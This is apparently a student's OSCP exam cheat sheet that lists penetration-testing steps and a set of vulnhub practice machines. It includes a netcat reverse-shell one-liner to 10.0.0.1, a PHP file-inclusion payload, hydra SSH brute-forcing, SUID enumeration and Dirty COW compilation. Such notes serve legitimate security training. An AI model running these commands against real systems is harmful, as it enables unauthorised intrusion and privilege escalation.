#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#
#$#$#$#$#$#$#$#$   NOTES For OSCP By OM $ #$#$#$#$#$#$#$#$#$#$#
#$#$#$##$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$

###############################################################
################## INFORMATION GATHERING ######################
###############################################################
#Hit Site, IP check, Google dorks, 


###############################################################
################# SCANNING & ENUMERATION  #####################
###############################################################
# For Simple Scan
#nmap -sC -sV -A ip

# For Intense Scan
#nmap -p 1-65535 -T4 -A -v ip

# Try python first if found in this find list 
#find / -perm -u=s -type f 2>/dev/null
#python -c 'import pty;pty.spawn("/bin/sh")'

# Start dirb on url nonhttps (Not all url could be found ;)
# check ftp anonymous login
#cewl http://ip/?q=node/1 -w /root/Desktop/custom_wordlist.txt
#Check for Local File Inclusion if PhP - /?lang=php://filter/convert.base64-encode/resource=index
#Reverse Shell - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet



# Observer everything files like hex, pcap file, folders, there could be password lyring front of you
# If No Inherent vulnerability found? Brute force could be the only way! 


###############################################################
################## GAINING ACCESS #############################
###############################################################
#hydra -l tiago -P /root/Desktop/custom_wordlist.txt ssh://ip
# Check Nikto section in sparta scan
#searchsploit -t openssh 7.1
Simple command to enable Reverse Sheel from machine if you get low level access
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


##################################################################
############## ESCALATING ACCESS - MAINTAINIG ACCESS #############
##################################################################
#first thing to check after ssh login done if successful above - id and sudo -s su - 
# use Linux-exploit-suggester.sh by wget gitlink  (Enumeration script in python for windows)
# chmod 755 first to run that downloaded shell and run it check exploit cpp programs in ext-url
# Download exploit and check cpp program if possible or just run it with gcc or g++ for e.g. 
#g++ -Wall -pedantic -02 -std=c++11 -pthread -o dcow file.cpp -lutil
# once you get the executable file of the same run it and check 



################################################################
################ EARASING FOOTPRINTS ###########################
################################################################
# For OSCP no need to erase Footprint! 
# Just hit the root and find the flag value to submit in report
# Boot to Root!! :)


###############################################################
#################### PRACTICE #################################
###############################################################
#vulnhub.com machines - all types - easy, intermediate, hard
#HTB - only latest vulnerabilities and exploits - tough sometimes
#OSCP Lab Machines - old+New combination of exploits

From - https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms

Beginner friendly

    Kioptrix: Level 1 (#1)
    Kioptrix: Level 1.1 (#2)
    Kioptrix: Level 1.2 (#3)
    Kioptrix: Level 1.3 (#4)
    FristiLeaks: 1.3
    Stapler: 1
    PwnLab: init

Intermediate

    Kioptrix: 2014
    Brainpan: 1
    Mr-Robot: 1
    HackLAB: Vulnix

Not so sure (Didn’t solve them yet)

    VulnOS: 2
    SickOs: 1.2
    /dev/random: scream
    pWnOS: 2.0
    SkyTower: 1
    IMF

